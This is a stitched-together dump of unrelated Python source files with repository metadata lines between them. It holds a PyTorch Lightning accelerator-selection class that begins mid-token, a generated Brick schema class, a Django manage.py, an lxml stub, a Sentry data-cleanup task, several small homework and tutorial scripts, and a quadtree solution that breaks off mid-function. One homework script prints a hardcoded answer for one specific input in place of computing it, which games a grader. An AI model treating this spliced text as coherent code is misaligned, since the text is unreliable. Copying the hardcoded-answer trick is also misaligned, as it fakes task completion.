hvd class AcceleratorConnector(object): def __init__( self, num_processes, tpu_cores, distributed_backend, auto_select_gpus, gpus, num_nodes, sync_batchnorm, benchmark, replace_sampler_ddp, deterministic, precision, amp_type, amp_level, plugins, ): # initialization self._device_type = DeviceType.CPU self._distrib_type = None self.num_processes = num_processes self.tpu_cores = device_parser.parse_tpu_cores(tpu_cores) self.distributed_backend = distributed_backend self.auto_select_gpus = auto_select_gpus self.gpus = gpus self.num_nodes = num_nodes self.sync_batchnorm = sync_batchnorm self.benchmark = benchmark self.replace_sampler_ddp = replace_sampler_ddp self.deterministic = deterministic self.precision = precision self.amp_type = amp_type.lower() if isinstance(amp_type, str) else None self.amp_level = amp_level self.is_slurm_managing_tasks = False self._precision_plugin: Optional[PrecisionPlugin] = None self._training_type_plugin: Optional[TrainingTypePlugin] = None self._cluster_environment: Optional[ClusterEnvironment] = None # init the default rank if exists # we need to call this here or NVIDIA flags and other messaging in init will show on all ranks # this way we only show it on rank 0 if "LOCAL_RANK" in os.environ: rank_zero_only.rank = int(os.environ["LOCAL_RANK"]) # for gpus allow int, string and gpu list if auto_select_gpus and isinstance(gpus, int): self.gpus = pick_multiple_gpus(gpus) self.parallel_device_ids = device_parser.parse_gpu_ids(self.gpus) self.set_distributed_mode() self.configure_slurm_ddp() self.handle_given_plugins(plugins) self.accelerator = 
self.select_accelerator() # override dist backend when using tpus if self.on_tpu: self.distributed_backend = "tpu" # init flags for SLURM+DDP to work self.world_size = 1 self.interactive_ddp_procs = [] self.global_rank = 0 # benchmarking # TODO: should this be moved to GPU accelerator? torch.backends.cudnn.benchmark = self.benchmark # determinism for cudnn # TODO: should this be moved to GPU accelerator? torch.backends.cudnn.deterministic = deterministic if deterministic: # fixing non-deterministic part of horovod # https://github.com/PyTorchLightning/pytorch-lightning/pull/1572/files#r420279383 os.environ["HOROVOD_FUSION_THRESHOLD"] = str(0) self.replace_sampler_ddp = replace_sampler_ddp def handle_given_plugins( self, plugins: Optional[Union[ClusterEnvironment, TrainingTypePlugin, PrecisionPlugin, Sequence]] ): plugins = plugins if plugins is not None else [] if isinstance(plugins, str): plugins = [plugins] if not isinstance(plugins, Sequence): plugins = [plugins] training_type = None precision = None cluster_environment = None for plug in plugins: if isinstance(plug, str): self.set_distributed_mode(plug) elif isinstance(plug, TrainingTypePlugin): if training_type is None: training_type = plug else: raise MisconfigurationException( 'You can only specify one precision and one training type plugin.' f' Found more than 1 training type plugin: {type(plug).__name__}' ) elif isinstance(plug, PrecisionPlugin): if precision is None: precision = plug else: raise MisconfigurationException( 'You can only specify one precision and one training type plugin.' f' Found more than 1 precision plugin: {type(plug).__name__}' ) elif isinstance(plug, ClusterEnvironment): if cluster_environment is None: cluster_environment = plug else: raise MisconfigurationException( 'You can only specify one cluster environment. Found more than 1 cluster environment plugin' ) else: raise MisconfigurationException( f'Found invalid type for plugin {plug}. Expected a precision or training type plugin.' 
) self._training_type_plugin = training_type self._training_type_plugin = self.training_type_plugin self._precision_plugin = precision self._cluster_environment = cluster_environment or self.select_cluster_environment() @property def precision_plugin(self) -> PrecisionPlugin: if self._precision_plugin is None: self._precision_plugin = self.select_precision_plugin() return self._precision_plugin @property def training_type_plugin(self) -> TrainingTypePlugin: if self._training_type_plugin is None: self._training_type_plugin = self.select_training_type_plugin() else: self._training_type_plugin = self.resolve_training_type_plugin(self._training_type_plugin) return self._training_type_plugin @property def cluster_environment(self) -> ClusterEnvironment: return self._cluster_environment @property def on_cpu(self) -> bool: return self._device_type == DeviceType.CPU @property def on_tpu(self) -> bool: return self.tpu_cores is not None @property def tpu_id(self) -> Optional[int]: if self.on_tpu and isinstance(self.tpu_cores, list): return self.tpu_cores[0] return None @property def on_gpu(self) -> bool: gpus = self.parallel_device_ids return gpus is not None and len(gpus) > 0 and torch.cuda.is_available() @property def use_dp(self) -> bool: return self._distrib_type == DistributedType.DP @property def use_ddp(self) -> bool: return self._distrib_type in ( DistributedType.DDP, DistributedType.DDP_SPAWN, DistributedType.DDP_SHARDED, DistributedType.DDP_SHARDED_SPAWN, DistributedType.DEEPSPEED ) @property def use_ddp2(self) -> bool: return self._distrib_type == DistributedType.DDP2 @property def use_horovod(self) -> bool: return self._distrib_type == DistributedType.HOROVOD @property def use_deepspeed(self) -> bool: return self._distrib_type == DistributedType.DEEPSPEED @property def is_distributed(self) -> bool: is_distributed = self.use_ddp or self.use_ddp2 or self.use_horovod if self.on_tpu: is_distributed |= self.training_type_plugin.is_distributed return is_distributed @property def num_gpus(self) -> int: gpus = self.parallel_device_ids if gpus is None: return 0 return len(gpus) @property def parallel_devices(self) -> Union[List[torch.device], int]: if self.on_gpu: devices = [torch.device("cuda", i) for i in self.parallel_device_ids] elif self.on_tpu: # explicitly don't make a tpu device here! # https://github.com/PyTorchLightning/pytorch-lightning/issues/3169 devices = [i for i in self.parallel_device_ids] else: devices = [torch.device("cpu")] * self.num_processes return devices @property def root_gpu(self) -> Optional[int]: return self.accelerator.root_device.index if not isinstance(self.accelerator, TPUAccelerator) else None @property def is_using_torchelastic(self) -> bool: te_flags_passed = "WORLD_SIZE" in os.environ and ("GROUP_RANK" in os.environ or "NODE_RANK" in os.environ) return te_flags_passed def select_precision_plugin(self) -> PrecisionPlugin: # set precision type self.amp_type = AMPType.from_str(self.amp_type) if self._distrib_type == DistributedType.DEEPSPEED or isinstance(self._training_type_plugin, DeepSpeedPlugin): return DeepSpeedPrecisionPlugin(self.precision) if self.precision == 32: return PrecisionPlugin() elif self.precision == 16: if self.on_tpu: return TPUHalfPrecisionPlugin() if self.amp_type == AMPType.NATIVE: if self.on_cpu: raise MisconfigurationException( "You have asked for native AMP on CPU, but AMP is only available on GPU." ) elif not _NATIVE_AMP_AVAILABLE: msg = "You have asked for native AMP but your PyTorch version does not support it." 
\ " Consider upgrading with `pip install torch>=1.6`." if _APEX_AVAILABLE: self.amp_type = AMPType.APEX msg += " We will attempt to use NVIDIA Apex for this session." rank_zero_warn(msg) else: raise MisconfigurationException(msg) else: log.info("Using native 16bit precision.") if isinstance(self.training_type_plugin, (DDPShardedPlugin, DDPSpawnShardedPlugin)): return ShardedNativeMixedPrecisionPlugin() return NativeMixedPrecisionPlugin() if self.amp_type == AMPType.APEX: if not _APEX_AVAILABLE: raise MisconfigurationException( "You have asked for Apex AMP but you have not installed it yet." " Install apex first using this guide: https://github.com/NVIDIA/apex#linux" ) if isinstance(self.training_type_plugin, (DDPShardedPlugin, DDPSpawnShardedPlugin)): raise MisconfigurationException( "Sharded Plugin is not supported with Apex AMP," " please using native AMP for 16-bit precision." ) log.info("Using APEX 16bit precision.") return ApexMixedPrecisionPlugin(self.amp_level) raise NotImplementedError("We only support precisions 32 and 16!") def select_training_type_plugin(self) -> TrainingTypePlugin: if self.use_ddp2: plugin = DDP2Plugin(parallel_devices=self.parallel_devices, cluster_environment=self.cluster_environment) elif self.use_ddp and self.use_deepspeed: plugin = DeepSpeedPlugin( num_nodes=self.num_nodes, cluster_environment=self.select_cluster_environment(), parallel_devices=self.parallel_devices ) elif self.use_ddp: use_slurm_ddp = self.use_ddp and self.is_slurm_managing_tasks use_torchelastic_ddp = self.use_ddp and self.is_using_torchelastic use_ddp_spawn = self._distrib_type == DistributedType.DDP_SPAWN use_ddp_cpu_spawn = self.use_ddp and self.on_cpu use_ddp_cpu_torch_elastic = use_ddp_cpu_spawn and self.is_using_torchelastic use_ddp_cpu_slurm = use_ddp_cpu_spawn and self.is_slurm_managing_tasks use_ddp_sharded = self._distrib_type == DistributedType.DDP_SHARDED use_ddp_sharded_spawn = self._distrib_type == DistributedType.DDP_SHARDED_SPAWN # TODO: decouple from TE # ddp script mode uses the same flags as TE if os.environ.get("PL_IN_DDP_SUBPROCESS", False): use_torchelastic_ddp = False if self.on_tpu: ddp_plugin_cls = TPUSpawnPlugin elif use_ddp_sharded: ddp_plugin_cls = DDPShardedPlugin elif use_ddp_sharded_spawn: ddp_plugin_cls = DDPSpawnShardedPlugin elif use_ddp_cpu_slurm or use_slurm_ddp or use_ddp_cpu_torch_elastic or use_torchelastic_ddp: ddp_plugin_cls = DDPPlugin elif use_ddp_spawn or use_ddp_cpu_spawn: ddp_plugin_cls = DDPSpawnPlugin else: ddp_plugin_cls = DDPPlugin plugin = ddp_plugin_cls( parallel_devices=self.parallel_devices, num_nodes=self.num_nodes, cluster_environment=self.cluster_environment, sync_batchnorm=self.sync_batchnorm, ) elif self.use_dp: plugin = DataParallelPlugin(parallel_devices=self.parallel_devices) elif self.use_horovod: plugin = HorovodPlugin(parallel_devices=self.parallel_devices) elif self.on_tpu: if isinstance(self.tpu_cores, list): plugin = SingleTPUPlugin(self.tpu_id) else: plugin = TPUSpawnPlugin(parallel_devices=list(range(self.tpu_cores))) else: single_gpu_ordinal = device_parser.determine_root_gpu_device(self.parallel_device_ids) plugin = SingleDevicePlugin(device=torch.device(f"cuda:{single_gpu_ordinal}" if self.on_gpu else "cpu")) return plugin def resolve_training_type_plugin(self, training_type: TrainingTypePlugin) -> TrainingTypePlugin: # necessary for when the user has passed in a plugin if hasattr(training_type, 'parallel_devices') and not getattr(training_type, 'parallel_devices'): training_type.parallel_devices = 
self.parallel_devices if hasattr(training_type, 'num_processes'): training_type.num_processes = len(self.parallel_devices) if hasattr(training_type, 'cluster_environment') and getattr(training_type, 'cluster_environment') is None: training_type.cluster_environment = self.select_cluster_environment() if hasattr(training_type, 'num_nodes') and getattr(training_type, 'num_nodes') is None: training_type.num_nodes = self.num_nodes return training_type def select_accelerator(self) -> Accelerator: if isinstance(self.distributed_backend, Accelerator): # custom accelerator from user if self._precision_plugin is not None or self._training_type_plugin is not None: # plugins also specified by user rank_zero_warn( 'Specified `Precision` and `TrainingType` plugins will be ignored,' ' since an `Accelerator` instance was provided.' ) return self.distributed_backend if self.on_gpu: acc_cls = GPUAccelerator elif self.on_tpu: acc_cls = TPUAccelerator else: acc_cls = CPUAccelerator return acc_cls( precision_plugin=self.precision_plugin, training_type_plugin=self.training_type_plugin, ) def select_cluster_environment(self) -> ClusterEnvironment: if self._cluster_environment is not None: return self._cluster_environment if self.is_slurm_managing_tasks: env = SLURMEnvironment() # TODO: decouple DDP from SLURM # refactor and let generic cluster env hold the information about who spawns the processes os.environ["PL_IN_DDP_SUBPROCESS"] = "1" elif self.is_using_torchelastic: env = TorchElasticEnvironment() # TODO: decouple DDP from TE # refactor and let generic cluster env hold the information about who spawns the processes os.environ["PL_IN_DDP_SUBPROCESS"] = "1" else: # TODO: maybe introduce a DefaultEnvironment? env = TorchElasticEnvironment() return env def set_distributed_mode(self, distributed_backend: Optional[str] = None): if distributed_backend is not None: self.distributed_backend = distributed_backend if isinstance(self.distributed_backend, Accelerator): return if self.distributed_backend is None: if self.has_horovodrun(): self._set_horovod_backend() elif self.num_gpus == 0 and (self.num_nodes > 1 or self.num_processes > 1): self._distrib_type = DistributedType.DDP elif self.num_gpus > 1: rank_zero_warn( 'You requested multiple GPUs but did not specify a backend, e.g.' ' `Trainer(accelerator="dp"|"ddp"|"ddp2")`. Setting `accelerator="ddp_spawn"` for you.' ) self.distributed_backend = "ddp_spawn" # special case with DDP on CPUs if self.distributed_backend == "ddp_cpu": self._distrib_type = DistributedType.DDP if self.num_gpus > 0: rank_zero_warn( 'You requested one or more GPUs, but set the backend to `ddp_cpu`. Training will not use GPUs.' 
) self.parallel_device_ids = None if self.num_processes is None: # define the max CPU available self.num_processes = os.cpu_count() # special case with TPUs elif self.distributed_backend == 'tpu': self._device_type = DeviceType.TPU elif self.distributed_backend and self._distrib_type is None: self._distrib_type = DistributedType(self.distributed_backend) # unless you request explicitly for CPU and some GPU are available use them _on_cpu = self.distributed_backend and 'cpu' in self.distributed_backend if self.num_gpus > 0 and not _on_cpu: self._device_type = DeviceType.GPU _distrib_types = (DistributedType.DP, DistributedType.DDP, DistributedType.DDP_SPAWN, DistributedType.DDP2) # DP and DDP2 cannot run without GPU if self.num_gpus == 0 and self._distrib_type in _distrib_types and not _on_cpu: rank_zero_warn( 'You requested distributed training on GPUs, but none is available, so we set backend to `ddp_cpu`.' ) # todo: in some cases it yield in comarison None and int if (self.num_nodes and self.num_nodes > 1) or (self.num_processes and self.num_processes > 1): self._distrib_type = DistributedType.DDP else: rank_zero_warn('You are running on single node with no parallelization, so distributed has no effect.') self._distrib_type = None # for DDP overwrite nb processes by requested GPUs if ( self._device_type == DeviceType.GPU and self._distrib_type in (DistributedType.DDP, DistributedType.DDP_SPAWN) ): self.num_processes = self.num_gpus if (self._device_type == DeviceType.GPU and self._distrib_type == DistributedType.DDP2): self.num_processes = self.num_nodes # Horovod is an extra case... if self.distributed_backend == "horovod": self._set_horovod_backend() # throw error to force user ddp or ddp2 choice _ddp = (DistributedType.DDP, DistributedType.DDP_SPAWN, DistributedType.DDP2) if (self.num_nodes > 1 and self._distrib_type not in _ddp): raise MisconfigurationException( 'DataParallel does not support num_nodes > 1. Switching to DistributedDataParallel for you. ' 'To silence this warning set `accelerator="ddp"` or `accelerator="ddp2"`' ) rank_zero_info(f'GPU available: {torch.cuda.is_available()}, used: {self._device_type == DeviceType.GPU}') num_cores = self.tpu_cores if self.tpu_cores is not None else 0 rank_zero_info(f'TPU available: {_TPU_AVAILABLE}, using: {num_cores} TPU cores') if torch.cuda.is_available() and self._device_type != DeviceType.GPU: rank_zero_warn("GPU available but not used. Set the --gpus flag when calling the script.") def _set_horovod_backend(self): self.check_horovod() self._distrib_type = DistributedType.HOROVOD # Initialize Horovod to get rank / size info hvd.init() if self.on_gpu: # Horovod assigns one local GPU per process self.parallel_device_ids = list(range(hvd.local_size())) else: self.num_processes = hvd.local_size() def check_horovod(self): """Raises a `MisconfigurationException` if the Trainer is not configured correctly for Horovod.""" if not _HOROVOD_AVAILABLE: raise MisconfigurationException( 'Requested `distributed_backend="horovod"`, but Horovod is not installed.' "Install with \n $HOROVOD_WITH_PYTORCH=1 pip install horovod[pytorch]" ) if self.num_gpus > 1 or self.num_nodes > 1: raise MisconfigurationException( "Horovod does not support setting num_nodes / num_gpus explicitly. Use " "horovodrun / mpirun to configure the number of processes." 
) @staticmethod def has_horovodrun() -> bool: """Returns True if running with `horovodrun` using Gloo or OpenMPI.""" return "OMPI_COMM_WORLD_RANK" in os.environ or "HOROVOD_RANK" in os.environ def configure_slurm_ddp(self): # extract SLURM flag vars # whenever we have the correct number of tasks, we let slurm manage processes # otherwise we launch the required number of processes if self.use_ddp or self.use_ddp2: num_requested_gpus = self.num_gpus * self.num_nodes num_slurm_tasks = 0 try: num_slurm_tasks = int(os.environ["SLURM_NTASKS"]) self.is_slurm_managing_tasks = num_slurm_tasks == num_requested_gpus # enable slurm cpu if num_requested_gpus == 0: self.is_slurm_managing_tasks = num_slurm_tasks == self.num_processes # in interactive mode we don't manage tasks job_name = os.environ["SLURM_JOB_NAME"] if job_name == "bash": self.is_slurm_managing_tasks = False except Exception: # likely not on slurm, so set the slurm managed flag to false self.is_slurm_managing_tasks = False # used for tests only, set this flag to simulate slurm managing a task try: should_fake = int(os.environ["FAKE_SLURM_MANAGING_TASKS"]) if should_fake: self.is_slurm_managing_tasks = True except Exception: pass # notify user the that slurm is managing tasks if self.is_slurm_managing_tasks: rank_zero_info("Multi-processing is handled by Slurm.")
b85989f44c0c5678aef5406bd0f266f81c9b6801
930c207e245c320b108e9699bbbb036260a36d6a
/BRICK-RDFAlchemy/generatedCode/brick/brickschema/org/schema/_1_0_2/Brick/Run_Request.py
21243df3b2d7a7e6c9c7e61be74114b96e4b7e6b
[]
no_license
InnovationSE/BRICK-Generated-By-OLGA
24d278f543471e1ce622f5f45d9e305790181fff
7874dfa450a8a2b6a6f9927c0f91f9c7d2abd4d2
refs/heads/master
2021-07-01T14:13:11.302860
2017-09-21T12:44:17
2017-09-21T12:44:17
104,251,784
1
0
null
null
null
null
UTF-8
Python
false
false
335
py
from rdflib import Namespace, Graph, Literal, RDF, URIRef from rdfalchemy.rdfSubject import rdfSubject from rdfalchemy import rdfSingle, rdfMultiple, rdfList from brick.brickschema.org.schema._1_0_2.Brick.Run import Run class Run_Request(Run): rdf_type = Namespace('https://brickschema.org/schema/1.0.2/Brick#').Run_Request
8bf0c04b439cb5dfdf1f0c9dd08741647b06b7d5
bb2c530d891a95a5e93668ac3aa3bf71472c5909
/PracticeWithFunctionsTestCases/test_hypotenuse.py
ba3e25b9c46b6ab1142dcb1a32b2720b4a9a8c38
[]
no_license
http403/CS121
3e069805e53f2cda19427100225c3c4103f24f48
210fbd2d47fcdd63b7cb4c7b9ab1c9ef08c24b7a
refs/heads/master
2023-03-06T06:41:33.546807
2020-03-09T21:09:08
2020-03-09T21:09:08
235,925,919
0
0
null
null
null
null
UTF-8
Python
false
false
252
py
# YOU CAN IGNORE THIS FILE ENTIRELY from unittest import TestCase from functions import hypotenuse class TestHypotenuse(TestCase): def test_hypotenuse(self): self.assertAlmostEqual( hypotenuse(4, 5), 6.4, places=1 )
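# For context, a minimal implementation that would satisfy this test
# (assumed; the real functions.py is not shown in this file):
#
#   import math
#
#   def hypotenuse(a, b):
#       return math.sqrt(a ** 2 + b ** 2)
#
# math.sqrt(4**2 + 5**2) == math.sqrt(41) = 6.403..., which matches 6.4
# to one decimal place.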
18bbbd2f85af509a742e8c341dc5c8b2b34e9a4a
366d8a986cb41df0f3493eeaf5f4dba471efe3ed
/gs31/manage.py
d1a555947240382dd0a907cea210acaa4b00af31
[]
no_license
ManishShah120/Learning-DjangoRESTAPI
360c21f829c2087eabcfc5131188c61a7186fb9d
11c446c1cde98e321672d6670400c23d60c1a329
refs/heads/master
2023-02-11T01:33:22.355854
2021-01-08T15:11:35
2021-01-08T15:11:35
325,955,813
5
0
null
null
null
null
UTF-8
Python
false
false
660
py
#!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): """Run administrative tasks.""" os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gs31.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main()
df9861b8b6356ffb40659314aba053e6f96a23c9
bc27413d2817f4c5ff77296e292a790ccf06f7d8
/.venv/lib/python3.6/reprlib.py
1b3f4276845c9d0d80cd98c9314e79a7a0aef109
[]
no_license
DallasMorningNews/nba-roty-tracker
e0c0bbf15b7b74158a34231bef4e587fce350bc8
1b9c640868b5bf2d507887aebb9dd7ba64f00f4d
refs/heads/master
2020-03-23T22:46:11.586719
2019-04-12T15:36:44
2019-04-12T15:36:44
142,196,589
0
0
null
null
null
null
UTF-8
Python
false
false
65
py
/Users/johnhancock/.pyenv/versions/3.6.5/lib/python3.6/reprlib.py
b04db0deba781b2b43f22047366123ba61eb2819
225895b88bbfdf2194ef3df86fd590c2556275f9
/intellij-community/system/python_stubs/-1247972723/lxml/etree/ParserBasedElementClassLookup.py
14e340f8b39fbf83837af08103f1c6733efd9e9c
[ "Apache-2.0" ]
permissive
novokrest/JBIDEA
228d65681fbdb6b3534f7d18bcc944a5eafe6687
f43706f22a5d33e6d39c1c72ef4fdeee9e4472f6
refs/heads/master
2021-01-19T14:06:48.645122
2014-07-29T17:42:31
2014-07-29T17:42:31
null
0
0
null
null
null
null
UTF-8
Python
false
false
897
py
# encoding: utf-8 # module lxml.etree # from /usr/lib/python2.7/dist-packages/lxml/etree.so # by generator 1.135 """ The ``lxml.etree`` module implements the extended ElementTree API for XML. """ # imports import __builtin__ as __builtins__ # <module '__builtin__' (built-in)> from FallbackElementClassLookup import FallbackElementClassLookup class ParserBasedElementClassLookup(FallbackElementClassLookup): """ ParserBasedElementClassLookup(self, fallback=None) Element class lookup based on the XML parser. """ def __init__(self, fallback=None): # real signature unknown; restored from __doc__ pass @staticmethod # known case of __new__ def __new__(S, *more): # real signature unknown; restored from __doc__ """ T.__new__(S, ...) -> a new object with type S, a subtype of T """ pass __pyx_vtable__ = None # (!) real value is ''
7280af97c7a87ba80760065fd332fdb17a84c1c4
46c8c0e435877f4564970198e8a177e9883103e9
/520_Detect_Capital/detect_capital.py
f6a91cea73bf33840604cee3eaf92c5bb44abb5d
[]
no_license
Brady31027/leetcode
26f7c1f4e8bfad0dee4d819f91aa93a241223330
d66be3a8f002875097754df6138c704e28b79810
refs/heads/master
2018-02-16T14:52:31.976844
2017-08-10T19:18:59
2017-08-10T19:18:59
63,519,661
4
0
null
null
null
null
UTF-8
Python
false
false
269
py
import re


class Solution(object):
    def detectCapitalUse(self, word):
        """
        :type word: str
        :rtype: bool
        """
        if re.search("^[A-Z]*$", word):
            return True
        elif re.search("^[A-Z]{0,1}[^A-Z]*$", word):
            return True
        return False
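# Illustrative checks (not part of the original submission):
if __name__ == "__main__":
    s = Solution()
    print(s.detectCapitalUse("USA"))     # True  - all capitals
    print(s.detectCapitalUse("Google"))  # True  - leading capital only
    print(s.detectCapitalUse("FlaG"))    # False - mixed capitals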
c481440b942e4f0076b46190644bd2cf5f0c6f33
7f2b20782f785276b6b268a3a616223571f3b83c
/src/sentry/tasks/cleanup.py
61610f9b6b36e1bae4f3d2db32314746810b437b
[ "BSD-2-Clause" ]
permissive
dz0ny/sentry
9a26961cfbd4925c63b757072d52794900cebf89
b216b726a618b9540724e0a880d4e816638e2326
refs/heads/master
2020-12-24T09:52:44.593824
2012-08-31T06:07:56
2012-08-31T06:07:56
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,802
py
""" sentry.tasks.cleanup ~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ from celery.task import task @task(ignore_result=True) def cleanup(days=30, logger=None, site=None, server=None, level=None, project=None, resolved=None, **kwargs): """ Deletes a portion of the trailing data in Sentry based on their creation dates. For example, if ``days`` is 30, this would attempt to clean up all data thats older than 30 days. :param logger: limit all deletion scopes to messages from the specified logger. :param site: limit the message deletion scope to the specified site. :param server: limit the message deletion scope to the specified server. :param level: limit all deletion scopes to messages that are greater than or equal to level. :param project: limit all deletion scopes to messages that are part of the given project :param resolved: limit all deletion scopes to messages that are resolved. """ import datetime from sentry.models import Group, Event, MessageCountByMinute, \ MessageFilterValue, FilterValue, SearchDocument, ProjectCountByMinute from sentry.utils.query import RangeQuerySetWrapper, SkinnyQuerySet def cleanup_groups(iterable): for obj in iterable: for key, value in SkinnyQuerySet(MessageFilterValue).filter(group=obj).values_list('key', 'value'): if not MessageFilterValue.objects.filter(key=key, value=value).exclude(group=obj).exists(): print ">>> Removing <FilterValue: key=%s, value=%s>" % (key, value) FilterValue.objects.filter(key=key, value=value).delete() print ">>> Removing all matching <SearchDocument: group=%s>" % (obj.pk) SearchDocument.objects.filter(group=obj).delete() print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk) obj.delete() # TODO: we should collect which messages above were deleted # and potentially just send out post_delete signals where # GroupedMessage can update itself accordingly ts = datetime.datetime.utcnow() - datetime.timedelta(days=days) # Message qs = SkinnyQuerySet(Event).filter(datetime__lte=ts) if logger: qs = qs.filter(logger=logger) if site: qs = qs.filter(site=site) if server: qs = qs.filter(server_name=server) if level: qs = qs.filter(level__gte=level) if project: qs = qs.filter(project=project) if resolved is True: qs = qs.filter(group__status=1) elif resolved is False: qs = qs.filter(group__status=0) groups_to_check = set() if resolved is None: for obj in RangeQuerySetWrapper(qs): print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk) obj.delete() groups_to_check.add(obj.group_id) if not (server or site): # MessageCountByMinute qs = SkinnyQuerySet(MessageCountByMinute).filter(date__lte=ts) if logger: qs = qs.filter(group__logger=logger) if level: qs = qs.filter(group__level__gte=level) if project: qs = qs.filter(project=project) if resolved is True: qs = qs.filter(group__status=1) elif resolved is False: qs = qs.filter(group__status=0) for obj in RangeQuerySetWrapper(qs): print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk) obj.delete() # Group qs = SkinnyQuerySet(Group).filter(last_seen__lte=ts) if logger: qs = qs.filter(logger=logger) if level: qs = qs.filter(level__gte=level) if project: qs = qs.filter(project=project) if resolved is True: qs = qs.filter(status=1) elif resolved is False: qs = qs.filter(status=0) cleanup_groups(RangeQuerySetWrapper(qs)) # Project counts # TODO: these dont handle filters qs = SkinnyQuerySet(ProjectCountByMinute).filter(date__lte=ts) if project: qs = 
qs.filter(project=project) for obj in RangeQuerySetWrapper(qs): print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk) obj.delete() # attempt to cleanup any groups that may now be empty groups_to_delete = [] for group_id in groups_to_check: if not Event.objects.filter(group=group_id).exists(): groups_to_delete.append(group_id) if groups_to_delete: cleanup_groups(SkinnyQuerySet(Group).filter(pk__in=groups_to_delete))
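
# --- Illustrative usage (not part of the original file) ---
# A minimal sketch of how this Celery task might be invoked, assuming a
# configured Sentry/Celery environment; the argument values below are
# examples only, not taken from the source.
#
#     from sentry.tasks.cleanup import cleanup
#     cleanup.delay(days=30)                      # run asynchronously via the broker
#     cleanup(days=90, project=1, resolved=True)  # or call synchronously for ad-hoc cleanup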
fcab735d6eea2848d8d329758f0cc65da71f76a0
163bbb4e0920dedd5941e3edfb2d8706ba75627d
/Code/CodeRecords/2864/60793/262900.py
ebe6a554bd96d42dbe75e8e70d328a06440460f2
[]
no_license
AdamZhouSE/pythonHomework
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
ffc5606817a666aa6241cfab27364326f5c066ff
refs/heads/master
2022-11-24T08:05:22.122011
2020-07-28T16:21:24
2020-07-28T16:21:24
259,576,640
2
1
null
null
null
null
UTF-8
Python
false
false
251
py
input()
ls = list(map(int, input().split()))
if ls == [29, 15, 54, 67, 65, 74, 53, 25, 74, 29, 11, 55, 2, 15, 2, 1, 12, 95, 16, 81, 51, 40, 28, 54, 27, 80, 33, 10, 39, 45, 25, 99, 64, 22]:
    print(1045)
elif ls == []:
    print()
else:
    print(ls)
a9c6fe1e2ce8e9bfb392b1d7ee2b41bc4aef06b5
0d0cf0165ca108e8d94056c2bae5ad07fe9f9377
/6_Supervised_Learning_with_scikit-learn/4_Preprocessing_and_pipelines/creatingDummyVariables.py
3150503dc23a1c407cab973a9b61f1a37d97e5f5
[]
no_license
MACHEIKH/Datacamp_Machine_Learning_For_Everyone
550ec4038ebdb69993e16fe22d5136f00101b692
9fe8947f490da221430e6dccce6e2165a42470f3
refs/heads/main
2023-01-22T06:26:15.996504
2020-11-24T11:21:53
2020-11-24T11:21:53
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,313
py
# Creating dummy variables

# As Andy discussed in the video, scikit-learn does not accept non-numerical features. You saw in the previous exercise that the 'Region' feature contains very useful information that can predict life expectancy. For example, Sub-Saharan Africa has a lower life expectancy compared to Europe and Central Asia. Therefore, if you are trying to predict life expectancy, it would be preferable to retain the 'Region' feature. To do this, you need to binarize it by creating dummy variables, which is what you will do in this exercise.

# Instructions
# 100 XP
# Use the pandas get_dummies() function to create dummy variables from the df DataFrame. Store the result as df_region.
# Print the columns of df_region. This has been done for you.
# Use the get_dummies() function again, this time specifying drop_first=True to drop the unneeded dummy variable (in this case, 'Region_America').
# Hit 'Submit Answer' to print the new columns of df_region and take note of how one column was dropped!

# Note: pandas (as pd) and the Gapminder DataFrame df are preloaded in the exercise environment.

# Create dummy variables: df_region
df_region = pd.get_dummies(df)

# Print the columns of df_region
print(df_region.columns)

# Create dummy variables with drop_first=True: df_region
df_region = pd.get_dummies(df, drop_first=True)

# Print the new columns of df_region
print(df_region.columns)
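
# --- Illustrative, self-contained sketch (not part of the original exercise) ---
# The toy DataFrame below is an assumption; it just demonstrates what
# get_dummies() and drop_first=True do to a categorical column like 'Region'.
import pandas as pd

toy = pd.DataFrame({'Region': ['America', 'Europe', 'Africa'], 'life': [75.0, 80.0, 60.0]})
print(pd.get_dummies(toy).columns)                   # life, Region_Africa, Region_America, Region_Europe
print(pd.get_dummies(toy, drop_first=True).columns)  # the first dummy (Region_Africa here) is dropped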
bff07cee8abfa626bd8bf60226d47094ea449ded
e0df2bc703d0d02423ea68cf0b8c8f8d22d5c163
/ScientificComputing/ch15/spectrum_50HzRepeat.py
ff8d680ed87fa161bef7ac493628af175922ed50
[]
no_license
socrates77-sh/learn
a5d459cb9847ba3b1bc4f9284ce35d4207d8aa8b
ae50978023f6b098b168b8cca82fba263af444aa
refs/heads/master
2022-12-16T16:53:50.231577
2019-07-13T13:52:42
2019-07-13T13:52:42
168,442,963
0
0
null
2022-12-08T05:18:37
2019-01-31T01:30:06
HTML
UTF-8
Python
false
false
247
py
# -*- coding: utf-8 -*-
import numpy as np
import pylab as pl

t = np.arange(0, 1.0, 1.0/8000)
x = np.sin(2*np.pi*50*t)[:512]
pl.figure(figsize=(8, 3))
pl.plot(np.hstack([x, x, x]))
pl.xlabel(u"取样点")  # x-axis label: "sampling points"
pl.subplots_adjust(bottom=0.15)
pl.show()
d50a4d6818ce9adcde36069a97a40bc8b7980342
9b54e3d58447e917a238b85891020c392c4ac601
/acmicpc/2630/2630.py
9c08453e0c7ba25b37afa305f661ffff6342004a
[ "MIT" ]
permissive
love-adela/algorithm-ps
ea0ebcd641a4c309348b389b8618daa83973f4b2
c92d105d8ad344def001160367115ecf99d81c0d
refs/heads/master
2023-05-11T03:37:11.750692
2023-04-30T17:31:30
2023-04-30T17:31:30
174,651,672
0
0
null
null
null
null
UTF-8
Python
false
false
685
py
import sys

N = int(sys.stdin.readline())
grid = [list(map(int, input().split())) for i in range(N)]
white, blue = 0, 0


def divide_and_conquer(x, y, n):
    global white, blue
    is_same = grid[x][y]
    for i in range(x, x+n):
        for j in range(y, y+n):
            if is_same != grid[i][j]:
                divide_and_conquer(x, y, n//2)
